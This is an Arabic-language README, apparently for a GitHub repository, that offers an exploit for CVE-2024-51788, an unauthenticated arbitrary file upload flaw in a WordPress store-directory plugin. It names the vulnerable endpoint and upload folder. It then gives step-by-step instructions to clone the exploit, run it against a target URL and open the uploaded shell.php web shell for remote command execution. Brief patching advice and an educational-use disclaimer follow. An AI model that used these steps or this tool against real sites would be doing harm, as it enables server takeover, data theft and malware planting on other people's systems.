
CVE-2024-51788 - إضافة The Novel Design Store Directory لووردبريس <= 4.3.0 - ثغرة رفع ملفات تعسفي بدون مصادقة
CVE-2024-51788 هو ثغرة حرجة تم الكشف عنها حديثًا وتؤثر على إضافة ووردبريس The Novel Design Store Directory (<= v4.3.0). تسمح هذه الثغرة للمهاجمين بدون مصادقة برفع ملفات تعسفية، بما في ذلك قذائف ويب خبيثة، مما يؤدي إلى تنفيذ كود عن بُعد (RCE) على الخادم المتأثر.
🔴 الخطورة: 10.0 / 10 (حرجة)
📅 تاريخ النشر: 11 نوفمبر 2024
📅 آخر تحديث: 12 نوفمبر 2024
🔗 معرّف CWE: CWE-434 - رفع ملفات غير مقيد
✅ اختراق كامل للخادم - يمكن للمهاجمين السيطرة الكاملة على الموقع وتنفيذ أوامر تعسفية.
✅ خرق البيانات - الوصول إلى المعلومات الحساسة وتعديلها.
✅ تشويه الموقع وحقن البرمجيات الخبيثة - يمكن للمهاجمين تعديل محتوى الموقع أو زرع برمجيات خبيثة.
✅ تصعيد الامتيازات - قد يستغل المهاجمون هذه الثغرة لتصعيد الامتيازات والتحرك الجانبي داخل الشبكة.
توجد الثغرة بسبب التحقق غير السليم من الملفات المرفوعة في نقطة النهاية wp-admin/options-general.php?page=licence. يمكن للمهاجمين رفع سكربتات PHP خبيثة إلى مجلد /wp-content/plugins/noveldesign-store-directory/images/ بدون مصادقة، مما يؤدي في النهاية إلى تنفيذ كود عن بُعد (RCE).
🚨 العوامل الرئيسية التي تمكّن الهجوم:
تم تطوير سكربت استغلال مبني على لغة Python لأتمتة عملية الاستغلال. يقوم هذا السكربت بـ:
✅ يتجاوز المصادقة باستخدام وكلاء مستخدمين وكوكيز عشوائية.
✅ يرفع قذيفة PHP خبيثة مباشرة إلى الخادم.
✅ ينفذ أوامر تعسفية على الجهاز المخترق.
✅ يكتشف تلقائيًا ما إذا كان الهدف معرضًا للخطر.
📌 استخدام سكربت الاستغلال:
usage: CVE-2024-51788.py [-h] -u URL
Exploit script for CVE-2024-51788 # by Nxploit Khaled Alenazi.
options:
-h, --help show this help message and exit
-u, --url URL Target URL
🔍 في حال نجاح العملية، سيتم رفع القذيفة إلى:
/wp-content/plugins/noveldesign-store-directory/images/
1️⃣ استنساخ المستودع:
git clone https://github.com/Nxploit/CVE-2024-51788.git
cd CVE-2024-51788
2️⃣ تشغيل سكربت الاستغلال:
python3 CVE-2024-51788.py -u http://target-wordpress-site.com
3️⃣ الوصول إلى القذيفة المرفوعة:
http://target-wordpress-site.com/wp-content/plugins/noveldesign-store-directory/images/shell.php
pip install requests argparse urllib3
🔹 قم بالتحديث إلى أحدث إصدار من إضافة The Novel Design Store Directory.
🔹 قيّد صلاحيات رفع الملفات للسماح بأنواع الملفات الآمنة فقط.
⚠️ سكربت الاستغلال هذا مخصص للأغراض التعليمية والبحثية فقط. الاستخدام غير المصرح به لهذا الاستغلال ضد الأنظمة دون الحصول على إذن مناسب غير قانوني. المؤلف غير مسؤول عن أي إساءة استخدام لهذه المعلومات.
📌 بواسطة: Nxploit | Khaled Alenazi | 🔥 تابعني للمزيد من أبحاث واستغلالات الأمن السيبراني!